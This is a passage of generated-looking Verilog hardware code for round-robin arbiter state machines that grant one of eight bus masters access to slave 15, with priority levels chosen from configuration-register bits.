                                            s15_msel_arb0_next_state = s15_msel_arb0_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s15_msel_arb0_grant3:
        begin
            if (  !( s15_msel_arb0_req[3]) | 1'b0 ) 
            begin
                if ( s15_msel_arb0_req[4] ) 
                begin
                    s15_msel_arb0_next_state = s15_msel_arb0_grant4;
                end
                else
                begin 
                    if ( s15_msel_arb0_req[5] ) 
                    begin
                        s15_msel_arb0_next_state = s15_msel_arb0_grant5;
                    end
                    else
                    begin 
                        if ( s15_msel_arb0_req[6] ) 
                        begin
                            s15_msel_arb0_next_state = s15_msel_arb0_grant6;
                        end
                        else
                        begin 
                            if ( s15_msel_arb0_req[7] ) 
                            begin
                                s15_msel_arb0_next_state = s15_msel_arb0_grant7;
                            end
                            else
                            begin 
                                if ( s15_msel_arb0_req[0] ) 
                                begin
                                    s15_msel_arb0_next_state = s15_msel_arb0_grant0;
                                end
                                else
                                begin 
                                    if ( s15_msel_arb0_req[1] ) 
                                    begin
                                        s15_msel_arb0_next_state = s15_msel_arb0_grant1;
                                    end
                                    else
                                    begin 
                                        if ( s15_msel_arb0_req[2] ) 
                                        begin
                                            s15_msel_arb0_next_state = s15_msel_arb0_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s15_msel_arb0_grant4:
        begin
            if (  !( s15_msel_arb0_req[4]) | 1'b0 ) 
            begin
                if ( s15_msel_arb0_req[5] ) 
                begin
                    s15_msel_arb0_next_state = s15_msel_arb0_grant5;
                end
                else
                begin 
                    if ( s15_msel_arb0_req[6] ) 
                    begin
                        s15_msel_arb0_next_state = s15_msel_arb0_grant6;
                    end
                    else
                    begin 
                        if ( s15_msel_arb0_req[7] ) 
                        begin
                            s15_msel_arb0_next_state = s15_msel_arb0_grant7;
                        end
                        else
                        begin 
                            if ( s15_msel_arb0_req[0] ) 
                            begin
                                s15_msel_arb0_next_state = s15_msel_arb0_grant0;
                            end
                            else
                            begin 
                                if ( s15_msel_arb0_req[1] ) 
                                begin
                                    s15_msel_arb0_next_state = s15_msel_arb0_grant1;
                                end
                                else
                                begin 
                                    if ( s15_msel_arb0_req[2] ) 
                                    begin
                                        s15_msel_arb0_next_state = s15_msel_arb0_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s15_msel_arb0_req[3] ) 
                                        begin
                                            s15_msel_arb0_next_state = s15_msel_arb0_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s15_msel_arb0_grant5:
        begin
            if (  !( s15_msel_arb0_req[5]) | 1'b0 ) 
            begin
                if ( s15_msel_arb0_req[6] ) 
                begin
                    s15_msel_arb0_next_state = s15_msel_arb0_grant6;
                end
                else
                begin 
                    if ( s15_msel_arb0_req[7] ) 
                    begin
                        s15_msel_arb0_next_state = s15_msel_arb0_grant7;
                    end
                    else
                    begin 
                        if ( s15_msel_arb0_req[0] ) 
                        begin
                            s15_msel_arb0_next_state = s15_msel_arb0_grant0;
                        end
                        else
                        begin 
                            if ( s15_msel_arb0_req[1] ) 
                            begin
                                s15_msel_arb0_next_state = s15_msel_arb0_grant1;
                            end
                            else
                            begin 
                                if ( s15_msel_arb0_req[2] ) 
                                begin
                                    s15_msel_arb0_next_state = s15_msel_arb0_grant2;
                                end
                                else
                                begin 
                                    if ( s15_msel_arb0_req[3] ) 
                                    begin
                                        s15_msel_arb0_next_state = s15_msel_arb0_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s15_msel_arb0_req[4] ) 
                                        begin
                                            s15_msel_arb0_next_state = s15_msel_arb0_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s15_msel_arb0_grant6:
        begin
            if (  !( s15_msel_arb0_req[6]) | 1'b0 ) 
            begin
                if ( s15_msel_arb0_req[7] ) 
                begin
                    s15_msel_arb0_next_state = s15_msel_arb0_grant7;
                end
                else
                begin 
                    if ( s15_msel_arb0_req[0] ) 
                    begin
                        s15_msel_arb0_next_state = s15_msel_arb0_grant0;
                    end
                    else
                    begin 
                        if ( s15_msel_arb0_req[1] ) 
                        begin
                            s15_msel_arb0_next_state = s15_msel_arb0_grant1;
                        end
                        else
                        begin 
                            if ( s15_msel_arb0_req[2] ) 
                            begin
                                s15_msel_arb0_next_state = s15_msel_arb0_grant2;
                            end
                            else
                            begin 
                                if ( s15_msel_arb0_req[3] ) 
                                begin
                                    s15_msel_arb0_next_state = s15_msel_arb0_grant3;
                                end
                                else
                                begin 
                                    if ( s15_msel_arb0_req[4] ) 
                                    begin
                                        s15_msel_arb0_next_state = s15_msel_arb0_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s15_msel_arb0_req[5] ) 
                                        begin
                                            s15_msel_arb0_next_state = s15_msel_arb0_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s15_msel_arb0_grant7:
        begin
            if (  !( s15_msel_arb0_req[7]) | 1'b0 ) 
            begin
                if ( s15_msel_arb0_req[0] ) 
                begin
                    s15_msel_arb0_next_state = s15_msel_arb0_grant0;
                end
                else
                begin 
                    if ( s15_msel_arb0_req[1] ) 
                    begin
                        s15_msel_arb0_next_state = s15_msel_arb0_grant1;
                    end
                    else
                    begin 
                        if ( s15_msel_arb0_req[2] ) 
                        begin
                            s15_msel_arb0_next_state = s15_msel_arb0_grant2;
                        end
                        else
                        begin 
                            if ( s15_msel_arb0_req[3] ) 
                            begin
                                s15_msel_arb0_next_state = s15_msel_arb0_grant3;
                            end
                            else
                            begin 
                                if ( s15_msel_arb0_req[4] ) 
                                begin
                                    s15_msel_arb0_next_state = s15_msel_arb0_grant4;
                                end
                                else
                                begin 
                                    if ( s15_msel_arb0_req[5] ) 
                                    begin
                                        s15_msel_arb0_next_state = s15_msel_arb0_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s15_msel_arb0_req[6] ) 
                                        begin
                                            s15_msel_arb0_next_state = s15_msel_arb0_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    assign s15_msel_arb1_req = { ( s15_msel_req[7] & ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[15] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[14] ) ) } == 2'd1 ) ), ( s15_msel_req[6] & ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[13] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[12] ) ) } == 2'd1 ) ), ( s15_msel_req[5] & ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[11] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[10] ) ) } == 2'd1 ) ), ( s15_msel_req[4] & ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[9] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[8] ) ) } == 2'd1 ) ), ( s15_msel_req[3] & ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[7] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[6] ) ) } == 2'd1 ) ), ( s15_msel_req[2] & ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[5] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[4] ) ) } == 2'd1 ) ), ( s15_msel_req[1] & ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[3] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[2] ) ) } == 2'd1 ) ), ( s15_msel_req[0] & ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[1] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[0] ) ) } == 2'd1 ) ) };
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s15_msel_arb1_state <= s15_msel_arb1_grant0;
        end
        else
        begin 
            s15_msel_arb1_state <= s15_msel_arb1_next_state;
        end
    end
    always @ (  s15_msel_arb1_state or  { ( s15_msel_req[7] & ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[15] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[14] ) ) } == 2'd1 ) ), ( s15_msel_req[6] & ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[13] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[12] ) ) } == 2'd1 ) ), ( s15_msel_req[5] & ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[11] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[10] ) ) } == 2'd1 ) ), ( s15_msel_req[4] & ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[9] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[8] ) ) } == 2'd1 ) ), ( s15_msel_req[3] & ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[7] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[6] ) ) } == 2'd1 ) ), ( s15_msel_req[2] & ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[5] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[4] ) ) } == 2'd1 ) ), ( s15_msel_req[1] & ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[3] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[2] ) ) } == 2'd1 ) ), ( s15_msel_req[0] & ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[1] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[0] ) ) } == 2'd1 ) ) } or  1'b0)
    begin
        s15_msel_arb1_next_state = s15_msel_arb1_state;
        case ( s15_msel_arb1_state ) 
        s15_msel_arb1_grant0:
        begin
            if (  !( s15_msel_arb1_req[0]) | 1'b0 ) 
            begin
                if ( s15_msel_arb1_req[1] ) 
                begin
                    s15_msel_arb1_next_state = s15_msel_arb1_grant1;
                end
                else
                begin 
                    if ( s15_msel_arb1_req[2] ) 
                    begin
                        s15_msel_arb1_next_state = s15_msel_arb1_grant2;
                    end
                    else
                    begin 
                        if ( s15_msel_arb1_req[3] ) 
                        begin
                            s15_msel_arb1_next_state = s15_msel_arb1_grant3;
                        end
                        else
                        begin 
                            if ( s15_msel_arb1_req[4] ) 
                            begin
                                s15_msel_arb1_next_state = s15_msel_arb1_grant4;
                            end
                            else
                            begin 
                                if ( s15_msel_arb1_req[5] ) 
                                begin
                                    s15_msel_arb1_next_state = s15_msel_arb1_grant5;
                                end
                                else
                                begin 
                                    if ( s15_msel_arb1_req[6] ) 
                                    begin
                                        s15_msel_arb1_next_state = s15_msel_arb1_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s15_msel_arb1_req[7] ) 
                                        begin
                                            s15_msel_arb1_next_state = s15_msel_arb1_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s15_msel_arb1_grant1:
        begin
            if (  !( s15_msel_arb1_req[1]) | 1'b0 ) 
            begin
                if ( s15_msel_arb1_req[2] ) 
                begin
                    s15_msel_arb1_next_state = s15_msel_arb1_grant2;
                end
                else
                begin 
                    if ( s15_msel_arb1_req[3] ) 
                    begin
                        s15_msel_arb1_next_state = s15_msel_arb1_grant3;
                    end
                    else
                    begin 
                        if ( s15_msel_arb1_req[4] ) 
                        begin
                            s15_msel_arb1_next_state = s15_msel_arb1_grant4;
                        end
                        else
                        begin 
                            if ( s15_msel_arb1_req[5] ) 
                            begin
                                s15_msel_arb1_next_state = s15_msel_arb1_grant5;
                            end
                            else
                            begin 
                                if ( s15_msel_arb1_req[6] ) 
                                begin
                                    s15_msel_arb1_next_state = s15_msel_arb1_grant6;
                                end
                                else
                                begin 
                                    if ( s15_msel_arb1_req[7] ) 
                                    begin
                                        s15_msel_arb1_next_state = s15_msel_arb1_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s15_msel_arb1_req[0] ) 
                                        begin
                                            s15_msel_arb1_next_state = s15_msel_arb1_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s15_msel_arb1_grant2:
        begin
            if (  !( s15_msel_arb1_req[2]) | 1'b0 ) 
            begin
                if ( s15_msel_arb1_req[3] ) 
                begin
                    s15_msel_arb1_next_state = s15_msel_arb1_grant3;
                end
                else
                begin 
                    if ( s15_msel_arb1_req[4] ) 
                    begin
                        s15_msel_arb1_next_state = s15_msel_arb1_grant4;
                    end
                    else
                    begin 
                        if ( s15_msel_arb1_req[5] ) 
                        begin
                            s15_msel_arb1_next_state = s15_msel_arb1_grant5;
                        end
                        else
                        begin 
                            if ( s15_msel_arb1_req[6] ) 
                            begin
                                s15_msel_arb1_next_state = s15_msel_arb1_grant6;
                            end
                            else
                            begin 
                                if ( s15_msel_arb1_req[7] ) 
                                begin
                                    s15_msel_arb1_next_state = s15_msel_arb1_grant7;
                                end
                                else
                                begin 
                                    if ( s15_msel_arb1_req[0] ) 
                                    begin
                                        s15_msel_arb1_next_state = s15_msel_arb1_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s15_msel_arb1_req[1] ) 
                                        begin
                                            s15_msel_arb1_next_state = s15_msel_arb1_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s15_msel_arb1_grant3:
        begin
            if (  !( s15_msel_arb1_req[3]) | 1'b0 ) 
            begin
                if ( s15_msel_arb1_req[4] ) 
                begin
                    s15_msel_arb1_next_state = s15_msel_arb1_grant4;
                end
                else
                begin 
                    if ( s15_msel_arb1_req[5] ) 
                    begin
                        s15_msel_arb1_next_state = s15_msel_arb1_grant5;
                    end
                    else
                    begin 
                        if ( s15_msel_arb1_req[6] ) 
                        begin
                            s15_msel_arb1_next_state = s15_msel_arb1_grant6;
                        end
                        else
                        begin 
                            if ( s15_msel_arb1_req[7] ) 
                            begin
                                s15_msel_arb1_next_state = s15_msel_arb1_grant7;
                            end
                            else
                            begin 
                                if ( s15_msel_arb1_req[0] ) 
                                begin
                                    s15_msel_arb1_next_state = s15_msel_arb1_grant0;
                                end
                                else
                                begin 
                                    if ( s15_msel_arb1_req[1] ) 
                                    begin
                                        s15_msel_arb1_next_state = s15_msel_arb1_grant1;
                                    end
                                    else
                                    begin 
                                        if ( s15_msel_arb1_req[2] ) 
                                        begin
                                            s15_msel_arb1_next_state = s15_msel_arb1_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s15_msel_arb1_grant4:
        begin
            if (  !( s15_msel_arb1_req[4]) | 1'b0 ) 
            begin
                if ( s15_msel_arb1_req[5] ) 
                begin
                    s15_msel_arb1_next_state = s15_msel_arb1_grant5;
                end
                else
                begin 
                    if ( s15_msel_arb1_req[6] ) 
                    begin
                        s15_msel_arb1_next_state = s15_msel_arb1_grant6;
                    end
                    else
                    begin 
                        if ( s15_msel_arb1_req[7] ) 
                        begin
                            s15_msel_arb1_next_state = s15_msel_arb1_grant7;
                        end
                        else
                        begin 
                            if ( s15_msel_arb1_req[0] ) 
                            begin
                                s15_msel_arb1_next_state = s15_msel_arb1_grant0;
                            end
                            else
                            begin 
                                if ( s15_msel_arb1_req[1] ) 
                                begin
                                    s15_msel_arb1_next_state = s15_msel_arb1_grant1;
                                end
                                else
                                begin 
                                    if ( s15_msel_arb1_req[2] ) 
                                    begin
                                        s15_msel_arb1_next_state = s15_msel_arb1_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s15_msel_arb1_req[3] ) 
                                        begin
                                            s15_msel_arb1_next_state = s15_msel_arb1_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s15_msel_arb1_grant5:
        begin
            if (  !( s15_msel_arb1_req[5]) | 1'b0 ) 
            begin
                if ( s15_msel_arb1_req[6] ) 
                begin
                    s15_msel_arb1_next_state = s15_msel_arb1_grant6;
                end
                else
                begin 
                    if ( s15_msel_arb1_req[7] ) 
                    begin
                        s15_msel_arb1_next_state = s15_msel_arb1_grant7;
                    end
                    else
                    begin 
                        if ( s15_msel_arb1_req[0] ) 
                        begin
                            s15_msel_arb1_next_state = s15_msel_arb1_grant0;
                        end
                        else
                        begin 
                            if ( s15_msel_arb1_req[1] ) 
                            begin
                                s15_msel_arb1_next_state = s15_msel_arb1_grant1;
                            end
                            else
                            begin 
                                if ( s15_msel_arb1_req[2] ) 
                                begin
                                    s15_msel_arb1_next_state = s15_msel_arb1_grant2;
                                end
                                else
                                begin 
                                    if ( s15_msel_arb1_req[3] ) 
                                    begin
                                        s15_msel_arb1_next_state = s15_msel_arb1_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s15_msel_arb1_req[4] ) 
                                        begin
                                            s15_msel_arb1_next_state = s15_msel_arb1_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s15_msel_arb1_grant6:
        begin
            if (  !( s15_msel_arb1_req[6]) | 1'b0 ) 
            begin
                if ( s15_msel_arb1_req[7] ) 
                begin
                    s15_msel_arb1_next_state = s15_msel_arb1_grant7;
                end
                else
                begin 
                    if ( s15_msel_arb1_req[0] ) 
                    begin
                        s15_msel_arb1_next_state = s15_msel_arb1_grant0;
                    end
                    else
                    begin 
                        if ( s15_msel_arb1_req[1] ) 
                        begin
                            s15_msel_arb1_next_state = s15_msel_arb1_grant1;
                        end
                        else
                        begin 
                            if ( s15_msel_arb1_req[2] ) 
                            begin
                                s15_msel_arb1_next_state = s15_msel_arb1_grant2;
                            end
                            else
                            begin 
                                if ( s15_msel_arb1_req[3] ) 
                                begin
                                    s15_msel_arb1_next_state = s15_msel_arb1_grant3;
                                end
                                else
                                begin 
                                    if ( s15_msel_arb1_req[4] ) 
                                    begin
                                        s15_msel_arb1_next_state = s15_msel_arb1_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s15_msel_arb1_req[5] ) 
                                        begin
                                            s15_msel_arb1_next_state = s15_msel_arb1_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s15_msel_arb1_grant7:
        begin
            if (  !( s15_msel_arb1_req[7]) | 1'b0 ) 
            begin
                if ( s15_msel_arb1_req[0] ) 
                begin
                    s15_msel_arb1_next_state = s15_msel_arb1_grant0;
                end
                else
                begin 
                    if ( s15_msel_arb1_req[1] ) 
                    begin
                        s15_msel_arb1_next_state = s15_msel_arb1_grant1;
                    end
                    else
                    begin 
                        if ( s15_msel_arb1_req[2] ) 
                        begin
                            s15_msel_arb1_next_state = s15_msel_arb1_grant2;
                        end
                        else
                        begin 
                            if ( s15_msel_arb1_req[3] ) 
                            begin
                                s15_msel_arb1_next_state = s15_msel_arb1_grant3;
                            end
                            else
                            begin 
                                if ( s15_msel_arb1_req[4] ) 
                                begin
                                    s15_msel_arb1_next_state = s15_msel_arb1_grant4;
                                end
                                else
                                begin 
                                    if ( s15_msel_arb1_req[5] ) 
                                    begin
                                        s15_msel_arb1_next_state = s15_msel_arb1_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s15_msel_arb1_req[6] ) 
                                        begin
                                            s15_msel_arb1_next_state = s15_msel_arb1_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    assign s15_msel_arb2_req = { ( s15_msel_req[7] & ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[15] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[14] ) ) } == 2'd2 ) ), ( s15_msel_req[6] & ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[13] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[12] ) ) } == 2'd2 ) ), ( s15_msel_req[5] & ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[11] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[10] ) ) } == 2'd2 ) ), ( s15_msel_req[4] & ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[9] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[8] ) ) } == 2'd2 ) ), ( s15_msel_req[3] & ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[7] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[6] ) ) } == 2'd2 ) ), ( s15_msel_req[2] & ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[5] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[4] ) ) } == 2'd2 ) ), ( s15_msel_req[1] & ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[3] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[2] ) ) } == 2'd2 ) ), ( s15_msel_req[0] & ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[1] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[0] ) ) } == 2'd2 ) ) };
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s15_msel_arb2_state <= s15_msel_arb2_grant0;
        end
        else
        begin 
            s15_msel_arb2_state <= s15_msel_arb2_next_state;
        end
    end
    always @ (  s15_msel_arb2_state or  { ( s15_msel_req[7] & ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[15] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[14] ) ) } == 2'd2 ) ), ( s15_msel_req[6] & ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[13] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[12] ) ) } == 2'd2 ) ), ( s15_msel_req[5] & ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[11] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[10] ) ) } == 2'd2 ) ), ( s15_msel_req[4] & ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[9] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[8] ) ) } == 2'd2 ) ), ( s15_msel_req[3] & ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[7] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[6] ) ) } == 2'd2 ) ), ( s15_msel_req[2] & ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[5] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[4] ) ) } == 2'd2 ) ), ( s15_msel_req[1] & ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[3] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[2] ) ) } == 2'd2 ) ), ( s15_msel_req[0] & ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[1] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[0] ) ) } == 2'd2 ) ) } or  1'b0)
    begin
        s15_msel_arb2_next_state = s15_msel_arb2_state;
        case ( s15_msel_arb2_state ) 
        s15_msel_arb2_grant0:
        begin
            if (  !( s15_msel_arb2_req[0]) | 1'b0 ) 
            begin
                if ( s15_msel_arb2_req[1] ) 
                begin
                    s15_msel_arb2_next_state = s15_msel_arb2_grant1;
                end
                else
                begin 
                    if ( s15_msel_arb2_req[2] ) 
                    begin
                        s15_msel_arb2_next_state = s15_msel_arb2_grant2;
                    end
                    else
                    begin 
                        if ( s15_msel_arb2_req[3] ) 
                        begin
                            s15_msel_arb2_next_state = s15_msel_arb2_grant3;
                        end
                        else
                        begin 
                            if ( s15_msel_arb2_req[4] ) 
                            begin
                                s15_msel_arb2_next_state = s15_msel_arb2_grant4;
                            end
                            else
                            begin 
                                if ( s15_msel_arb2_req[5] ) 
                                begin
                                    s15_msel_arb2_next_state = s15_msel_arb2_grant5;
                                end
                                else
                                begin 
                                    if ( s15_msel_arb2_req[6] ) 
                                    begin
                                        s15_msel_arb2_next_state = s15_msel_arb2_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s15_msel_arb2_req[7] ) 
                                        begin
                                            s15_msel_arb2_next_state = s15_msel_arb2_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s15_msel_arb2_grant1:
        begin
            if (  !( s15_msel_arb2_req[1]) | 1'b0 ) 
            begin
                if ( s15_msel_arb2_req[2] ) 
                begin
                    s15_msel_arb2_next_state = s15_msel_arb2_grant2;
                end
                else
                begin 
                    if ( s15_msel_arb2_req[3] ) 
                    begin
                        s15_msel_arb2_next_state = s15_msel_arb2_grant3;
                    end
                    else
                    begin 
                        if ( s15_msel_arb2_req[4] ) 
                        begin
                            s15_msel_arb2_next_state = s15_msel_arb2_grant4;
                        end
                        else
                        begin 
                            if ( s15_msel_arb2_req[5] ) 
                            begin
                                s15_msel_arb2_next_state = s15_msel_arb2_grant5;
                            end
                            else
                            begin 
                                if ( s15_msel_arb2_req[6] ) 
                                begin
                                    s15_msel_arb2_next_state = s15_msel_arb2_grant6;
                                end
                                else
                                begin 
                                    if ( s15_msel_arb2_req[7] ) 
                                    begin
                                        s15_msel_arb2_next_state = s15_msel_arb2_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s15_msel_arb2_req[0] ) 
                                        begin
                                            s15_msel_arb2_next_state = s15_msel_arb2_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s15_msel_arb2_grant2:
        begin
            if (  !( s15_msel_arb2_req[2]) | 1'b0 ) 
            begin
                if ( s15_msel_arb2_req[3] ) 
                begin
                    s15_msel_arb2_next_state = s15_msel_arb2_grant3;
                end
                else
                begin 
                    if ( s15_msel_arb2_req[4] ) 
                    begin
                        s15_msel_arb2_next_state = s15_msel_arb2_grant4;
                    end
                    else
                    begin 
                        if ( s15_msel_arb2_req[5] ) 
                        begin
                            s15_msel_arb2_next_state = s15_msel_arb2_grant5;
                        end
                        else
                        begin 
                            if ( s15_msel_arb2_req[6] ) 
                            begin
                                s15_msel_arb2_next_state = s15_msel_arb2_grant6;
                            end
                            else
                            begin 
                                if ( s15_msel_arb2_req[7] ) 
                                begin
                                    s15_msel_arb2_next_state = s15_msel_arb2_grant7;
                                end
                                else
                                begin 
                                    if ( s15_msel_arb2_req[0] ) 
                                    begin
                                        s15_msel_arb2_next_state = s15_msel_arb2_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s15_msel_arb2_req[1] ) 
                                        begin
                                            s15_msel_arb2_next_state = s15_msel_arb2_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s15_msel_arb2_grant3:
        begin
            if (  !( s15_msel_arb2_req[3]) | 1'b0 ) 
            begin
                if ( s15_msel_arb2_req[4] ) 
                begin
                    s15_msel_arb2_next_state = s15_msel_arb2_grant4;
                end
                else
                begin 
                    if ( s15_msel_arb2_req[5] ) 
                    begin
                        s15_msel_arb2_next_state = s15_msel_arb2_grant5;
                    end
                    else
                    begin 
                        if ( s15_msel_arb2_req[6] ) 
                        begin
                            s15_msel_arb2_next_state = s15_msel_arb2_grant6;
                        end
                        else
                        begin 
                            if ( s15_msel_arb2_req[7] ) 
                            begin
                                s15_msel_arb2_next_state = s15_msel_arb2_grant7;
                            end
                            else
                            begin 
                                if ( s15_msel_arb2_req[0] ) 
                                begin
                                    s15_msel_arb2_next_state = s15_msel_arb2_grant0;
                                end
                                else
                                begin 
                                    if ( s15_msel_arb2_req[1] ) 
                                    begin
                                        s15_msel_arb2_next_state = s15_msel_arb2_grant1;
                                    end
                                    else
                                    begin 
